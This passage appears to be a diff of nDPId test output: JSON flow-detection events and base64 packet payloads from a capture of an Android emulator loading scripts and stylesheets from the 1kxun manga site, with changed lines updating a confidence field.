{"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/detail?id=27159&sytjdt&_in_app=kankan&_udid=e6dbd30b-3b84-44b4-9751-631148a3ede9&_v=2.8.2.1&_package=com.sceneway.kankan&_model=sdk_gphone_x86&_ov=11&_brand=Google&_android_id=b9e28776354d259e&_gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&t=1654385139","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 02409{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1628,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":2,"flow_last_seen":1654385140551,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1654385140551,"pkt":"nLbQ0+MztKXvZygQCABFAAXUeftAADQGVXChdQ0dwKgCfgBQsUTPZm\/vK5uWr4AQAO+9VgAAAQEICpcRFhe6xhP0SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNTo0MCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sDQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KTGFzdC1Nb2RpZmllZDogVHVlLCAxMCBNYXkgMjAyMiAwNzoxNzo1NyBHTVQNCkVUYWc6IFcvIjYyN2ExMWE1LTFhZmQiDQpDb250ZW50LUVuY29kaW5nOiBnemlwDQoNCjk0NQ0KH4sIAAAAAAAAA+1ZzXPjthW\/+6\/A8hBKYxIk9S3LtGfX3kkz2a\/uutN2NB4NREIyZArgkpBlxfa5nZ46PeTQe0+9Z9Imf85urv0X+gCQEuWP7qbNTJJJPR6TAB8e3jceft5\/dPzy6OT3r56iMzlP0KvfPHn22RGyXM\/7bfPI845PjtHvfnXy\/BkKsI9OMsJzJpngJPG8py+sHYSsMynTPc9bLpd42cQim3onr71LxS1Qy4tXV1bW4ljG1sHOviJSD0riA2C1P6eSgBwydenbBbsIrSPBJeXSPVml1EKRGYWWpJfSU4sHKDojWU5luJATtzdAkiY0PROchlxY3oYpJ3MaWheMLlORSSW3+VmzXLJYnoUxvWARdfXAQYyDriRx84gkNAQDOGhOLtl8Md+aArJbU4ucZpqEjGHhfZJkdEKzjGYVpUTGpoyDWcAQCePn6AyIQsuL8twjaYrheRi0+n7bQhLMUVgBZi2U0SS0crlKaH5GqSwUrzKZ5V6+ZCnNigeeM644fhSv\/UeuC0LlUcZSiUi+4hHKswhk81IyBec18FSIKey+4jGLiAoQHIl58dWDzUmcj1eGCM9y62DfM9wOXFcrXPDWXFUA5BBR6QXOxdlCc4qYXM1ywQ8ZNa6usFAGK9ZXDDMjF8TMWgdoyXgsljhKxAKeSY7CO1PX11cQR5Lxab53dePkksiFersZrFdhcAOLQ6vhN3y\/HfSbrb5V+ZouxgmLRud0FVo+bY07vd44GkfNqN0nzaAx7nf9dp9OYHHUa1Hapj06Dvx2L+4EjV43isbjSTQJSK9NSMMaoNpkwSNlytrSiZ3cSRxWv1oOk9NQ\/bm+Hp4O1AtOF\/lZ7cqeyjkGoTNp73G6RMdE0lodT6k8YXN4c+gFJNKeJpvl9k19cEEyNAljRfI0oXP4mj9ZnZDpC0iVWl4f+qfODD5HGQVWBQXMO3ESJo9COyaSPCMrmtmH9idJaO8me7Y9mGEdHqHMFhQGyp926U+Sso0HMGEqLpTUs\/wQrGrvst04GUxwSjKQ5YWIKWYcEkk+oROR0drMmdQHN\/Wa8aUTi2ihhHZs42XbqYjk2J+ePHfbjfbz1vOmXR+gdbztfDBa1rUBmSAvxX\/7BZQVnWR4Ktl8iiPu6TlPpJSDct7baJQIEtNMhThSBnKLiAn8oN3tNpt+MZ3RmGU0kouMhbqAqnhX9iHndE74lOigX9KxlwgoCr9++5oCLYdqUZQ7S9c7C20SaWfnnjQNbe0OW2uydoQq1SYXJZmChVXNy\/WOMNZeSSWoYG+Yb2ep0Sx2o4SBA0IrIi7Evtvq9IJu0Gp3m61mM+j0rGqpKK34PxeMe\/Xc9lROo0VGQSSoOniKYwGJSUHY6BxzKr0tJSt1RClZiQ4TyJZ+WNsbfKQBK7zvMN5m+F9KvJFWFVFU1rS1bzdlbjN1fY2uonm8h4anNwO9av0Nw7wpJ+vSU0dXmgahDVVMJ4zTN4mQNdtrBJ1Otxv0G93AK4N3lEuw9WrUbPuXbX8UBEHXdtBwCGMHtaGuIHuSLFisJjstmGt21OSw2TDfFUHMLtxpKl0S"} 02113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1629,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":3,"flow_last_seen":1654385140556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1267,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1267,"pkt_l4_len":1233,"thread_ts_msec":1654385140556,"pkt":"nLbQ0+MztKXvZygQCABFAATlefxAADQGVl6hdQ0dwKgCfgBQsUTPZnWPK5uWr4AYAO+qDAAAAQEICpcRFhe6xhP0u0Gn2Wk3A7\/T7fd6rm\/XMYnjNyZsaxuxjL9r9brRqipx+QlDnkIovIEin9DX0GNAPtf+E30kkoSkOX06T+XqmF3k91EXTIs8Kimgwir3lOecejeF6qflqjHhnGZ3XLXllrXbPuChwO81Gv7\/PZRAGwvHww+UTBz6qQs6gsoPnkrW2bRJoTJtIINa\/b6Dgk5fZdPahfenU9Dst3o\/X2dtHXa6izQzCLFJTbWBYoJYfnQOJy8KQ2SVFc2CiqYKfUmt6R8VlFA8bn1EqFZpXTf1tDoJFXV4Wi\/6sG3eqiibCjUi8cicl3vowQPTubvaFJeROjZHCfRwCTDK95Dqr24TQ8XZnrqpDiuDdVFS37fbhi1Lqg5xXV9B9827OkRutnZbf1NxX6XVY22ih+nvHjpVyUsTqqT6yZ89Dwn+gSPog8vuO4keWnTnQKoSFlGyToAtx\/2QjvhxTpaqqtXA+eXZ\/0c\/N34urjBHwa2i6BlQykBS5a1LX7oAVdqXTCb04Ltv\/\/7+L1\/ue2a0sw89K1L4AFz6VOsPQyAtJyu3EKLAr3U\/WEVzKqCFuSB4nslPrO6Y7szc0iqsvIj4NIppYxtV2Sl23ynK+04JkGiABas73gy632zlBjiAXw0HbeEyD66AjQRP3QZuYf\/7LEvIFyt1O\/7AGlsLdxerguuoMZStwb+NoSq31C2ZtxgZZTE04NDQ51KkhRQfwfPdN3979\/WfvvvyD++++er9n\/\/4\/h9fvfv6n\/\/69q8xBY\/ElEcrlyQJWGVHx7vp8QvngZnvkBWI28eqYSlfTcZuHp8rF38\/G+jFgPvEIsPjBY8TCjwOg04LOr9ur9v6CHZbNtX8ILrhKm1APoUirjn2ABWrXnm3Ym59\/xcMgCYcnF8uOJ6LsUaBQDlPz4wMwwe5eFUt2uru2W8GD1N7MoKAW9JYJEKca4QDrAmwSmHNDcABebK5nT0qm0UE0BuKHSTLa\/ASn7BzKc4fAwC+gktu\/nI8AxgnlBpNk\/ItYHNSAXTSAHQwgwHUPhNxHg4t1cRZjgVIeHQOTwbRI9lkpV45QHccUBh4j+l4MYWn4OrPZKJfI7UQkLhYUZOEEUU5zcQihac5749ARabIYparW24xPnWUEABtPubxsUKdw1K7mnRo\/UoO6elmCsamB4BZsBcHP9ceZxlZ4TQTUqjGGufgfooBE09qJJtqEC53\/Hq9DlgpIHU11Tay0B+w\/Yr6OKF8Ks8GbHe3fkugGoy1kIWlhuy0PlA0pVU24sn6VbkDDRXJiBWmdjjsyO\/bkd+zI93aj8N+mQbYEL3RX1Sh2uxKHV6\/MlptwLoyArDUEaGDiwU97qXskiaehltzlbJalRErxAWY2WwBkoPhh8Y9eoBHi5Dp7UcQUUo5uaHWbtotkV1DJQyV2FAJxZOrsQ5IEZYo6S0Y1zLBbtUHAt+PmTuiQHIf+fCqjg22ax1C3qgDbpfuWp8kbAxvJvLJZqN74eT1foAqD8iDEK9wSB1AKY04KQMoN9Tsox6k+ecnR\/7Lz5uPX79qfxY8\/xQw3TWVSiuDutyU4DAq9QYkCRgp6vX5rs5E\/c+jg51\/A9YbBkX9GgAADQowDQoNCg=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140779,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":443,"flow_avg_l4_payload_len":443,"midstream":1,"thread_ts_msec":1654385140779,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1654385140779,"pkt":"tKXvZygQnLbQ0+MzCABFAAHvAsFAAEAGxI\/AqAJ+oXUNHbFMAFBD8y8ewu06rIAYAfZzmgAAAQEICrrGFlSXERfAR0VUIC9qcy9zd2lwZXIvc3dpcGVyLm1pbi5jc3MgSFRUUC8xLjENCkhvc3Q6IG1hbmdhd2ViLjFreHVuLm1vYmkNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogdGV4dC9jc3MsKi8qO3E9MC4xDQpYLVJlcXVlc3RlZC1XaXRoOiBjb20uc2NlbmV3YXkua2Fua2FuDQpSZWZlcmVyOiBodHRwOi8vbWFuZ2F3ZWIuMWt4dW4ubW9iaS8NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KDQo="} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140779,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":443,"flow_avg_l4_payload_len":443,"midstream":1,"thread_ts_msec":1654385140779,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/swiper\/swiper.min.css","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1635,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140779,"flow_last_seen":1654385140779,"flow_idle_time":7580000,"flow_min_l4_payload_len":443,"flow_max_l4_payload_len":443,"flow_tot_l4_payload_len":443,"flow_avg_l4_payload_len":443,"midstream":1,"thread_ts_msec":1654385140779,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45388,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/swiper\/swiper.min.css","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140794,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385140794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01038{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":490,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":490,"pkt_l4_len":456,"thread_ts_msec":1654385140794,"pkt":"tKXvZygQnLbQ0+MzCABFAAHcEGNAAEAGtwDAqAJ+oXUNHbFWAFBjG+nbqUorjYAYAfZzhwAAAQEICrrGFmOXERfRR0VUIC9qcy9kZXBlbmRlbmN5LWFsbC5qcyBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140794,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385140794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/dependency-all.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1636,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140794,"flow_last_seen":1654385140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":424,"flow_max_l4_payload_len":424,"flow_tot_l4_payload_len":424,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1654385140794,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45398,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/dependency-all.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140824,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":1,"thread_ts_msec":1654385140824,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01026{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"thread_ts_msec":1654385140824,"pkt":"tKXvZygQnLbQ0+MzCABFAAHUlAtAAEAGM2DAqAJ+oXUNHbFmAFDqwyBTbdxR+IAYAfZzfwAAAQEICrrGFoGXERfuR0VUIC9qcy9mYi1zZGsuanMgSFRUUC8xLjENCkhvc3Q6IG1hbmdhd2ViLjFreHVuLm1vYmkNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogKi8qDQpYLVJlcXVlc3RlZC1XaXRoOiBjb20uc2NlbmV3YXkua2Fua2FuDQpSZWZlcmVyOiBodHRwOi8vbWFuZ2F3ZWIuMWt4dW4ubW9iaS8NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KDQo="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140824,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":1,"thread_ts_msec":1654385140824,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/fb-sdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1637,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140824,"flow_last_seen":1654385140824,"flow_idle_time":7580000,"flow_min_l4_payload_len":416,"flow_max_l4_payload_len":416,"flow_tot_l4_payload_len":416,"flow_avg_l4_payload_len":416,"midstream":1,"thread_ts_msec":1654385140824,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45414,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/fb-sdk.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140835,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":434,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":434,"midstream":1,"thread_ts_msec":1654385140835,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":500,"pkt_l4_len":466,"thread_ts_msec":1654385140835,"pkt":"tKXvZygQnLbQ0+MzCABFAAHm88RAAEAG05TAqAJ+oXUNHbFoAFBS0EalvQnYUYAYAfZzkQAAAQEICrrGFoyXERf6R0VUIC9qcy92ZW5kb3IuYnVuZGxlLmpzPzE2NDQ4MDc4NzQgSFRUUC8xLjENCkhvc3Q6IG1hbmdhd2ViLjFreHVuLm1vYmkNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogKi8qDQpYLVJlcXVlc3RlZC1XaXRoOiBjb20uc2NlbmV3YXkua2Fua2FuDQpSZWZlcmVyOiBodHRwOi8vbWFuZ2F3ZWIuMWt4dW4ubW9iaS8NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuOQ0KDQo="} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140835,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":434,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":434,"midstream":1,"thread_ts_msec":1654385140835,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/vendor.bundle.js?1644807874","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1638,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140835,"flow_last_seen":1654385140835,"flow_idle_time":7580000,"flow_min_l4_payload_len":434,"flow_max_l4_payload_len":434,"flow_tot_l4_payload_len":434,"flow_avg_l4_payload_len":434,"midstream":1,"thread_ts_msec":1654385140835,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45416,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/vendor.bundle.js?1644807874","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140836,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":436,"midstream":1,"thread_ts_msec":1654385140836,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01055{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":502,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":502,"pkt_l4_len":468,"thread_ts_msec":1654385140836,"pkt":"tKXvZygQnLbQ0+MzCABFAAHoPA1AAEAGi0rAqAJ+oXUNHbFuAFD4VTA0r32OCIAYAfZzkwAAAQEICrrGFo2XERf6R0VUIC9qcy9hcHBsaWNhdGlvbi5taW4uanM\/MTY0NDgwODIwMCBIVFRQLzEuMQ0KSG9zdDogbWFuZ2F3ZWIuMWt4dW4ubW9iaQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDExOyBzZGtfZ3Bob25lX3g4NiBCdWlsZC9SU1IxLjIwMTAxMy4wMDE7IHd2KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvODMuMC40MTAzLjEwNiBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KQWNjZXB0OiAqLyoNClgtUmVxdWVzdGVkLVdpdGg6IGNvbS5zY2VuZXdheS5rYW5rYW4NClJlZmVyZXI6IGh0dHA6Ly9tYW5nYXdlYi4xa3h1bi5tb2JpLw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTLGVuO3E9MC45DQoNCg=="} -00967{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1639,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385140836,"flow_last_seen":1654385140836,"flow_idle_time":7580000,"flow_min_l4_payload_len":436,"flow_max_l4_payload_len":436,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":436,"midstream":1,"thread_ts_msec":1654385140836,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"161.117.13.29","src_port":45422,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"mangaweb.1kxun.mobi","url":"mangaweb.1kxun.mobi\/js\/application.min.js?1644808200","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 